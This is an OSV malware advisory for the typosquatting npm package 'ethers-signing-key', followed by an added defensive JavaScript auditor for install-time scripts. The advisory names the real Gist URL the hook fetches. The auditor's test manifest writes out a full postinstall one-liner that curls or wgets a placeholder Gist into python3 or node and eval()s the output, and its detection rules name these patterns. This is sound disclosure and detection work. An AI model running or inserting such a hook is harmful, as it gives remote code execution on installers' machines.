ethers-signing-key @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-3761
Ecosystem
npm
Summary
The package's npm postinstall hook runs a one-liner that uses child_process.exec to curl or wget an unpinned Python script from an individual user's GitHub Gist (gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py) and pipe it directly into python3 (falling back to node). The captured stdout is then also passed to eval(). The remote URL is mutable, unauthenticated and not version-pinned, so the Gist owner can change the executed payload at any time. The package has no functional library surface (index.js contains only module.exports = {};), and the name 'ethers-signing-key' impersonates the ethers blockchain library, which exposes a SigningKey class. The only meaningful effect of npm install ethers-signing-key is therefore arbitrary remote code execution on the installer's machine at install time.
Source: amazon-inspector (b6735be7311be4f6b4f609762cfb77504fe141bc9d8d5b5c0a75d521119aa2fa)
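Added example, not part of the OSV record or Amazon Inspector's tooling: a small defender-side auditor that flags install-time lifecycle scripts matching the pattern described above (remote fetch, pipe into an interpreter, eval()). The two manifests are constructed, and the Gist URL in the suspicious one is a placeholder rather than the address named in the report.

```javascript
// Lifecycle-script auditor for package.json manifests (added example).
// Flags hooks that fetch remote content at install time and feed it to an
// interpreter or eval(), the behaviour described in the report above.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Each rule is a regex over the script text plus a short reason string.
const RULES = [
  { id: 'remote-fetch',   re: /\b(curl|wget)\b[^|;&]*https?:\/\//i,                    why: 'downloads remote content at install time' },
  { id: 'mutable-source', re: /gist\.githubusercontent\.com|raw\.githubusercontent\.com/i, why: 'source is an unpinned, user-editable URL' },
  { id: 'pipe-to-interp', re: /\|\s*(python3?|sh|bash|node)\b/i,                       why: 'pipes downloaded content into an interpreter' },
  { id: 'eval',           re: /\beval\s*\(/,                                             why: 'evaluates a string as code' },
  { id: 'child-process',  re: /child_process|\.exec\s*\(/,                              why: 'spawns shell commands from the hook' },
];

// Returns one finding per (hook, rule) match for the parsed package.json object;
// an empty array means no lifecycle hook matched any rule.
function auditInstallScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    for (const rule of RULES) {
      if (rule.re.test(cmd)) findings.push({ hook, rule: rule.id, why: rule.why });
    }
  }
  return findings;
}

// Constructed manifest mirroring the report: an empty library whose postinstall
// hook curls a Gist and pipes it into python3, falling back to node, then eval()s
// the output. EXAMPLE_USER/EXAMPLE_ID is a placeholder, not a real Gist.
const suspiciousPkg = {
  name: 'ethers-signing-key',
  version: '1.0.0',
  main: 'index.js',
  scripts: {
    postinstall:
      'node -e "require(\'child_process\').exec(\'curl -fsSL https://gist.githubusercontent.com/EXAMPLE_USER/EXAMPLE_ID/raw/build_utils.py | python3 || wget -qO- https://gist.githubusercontent.com/EXAMPLE_USER/EXAMPLE_ID/raw/build_utils.py | node\', (e, out) => eval(out))"',
  },
};

// Constructed benign manifest: a local build step that touches no network.
const benignPkg = { name: 'demo-lib', version: '1.0.0', scripts: { postinstall: 'node scripts/build.js', test: 'jest' } };

console.log(JSON.stringify(auditInstallScripts(suspiciousPkg), null, 2)); // five findings on postinstall
console.log(JSON.stringify(auditInstallScripts(benignPkg)));              // []
```

Installing with lifecycle scripts disabled (npm install --ignore-scripts) prevents such hooks from running at all; the auditor is for triaging what a manifest would have executed.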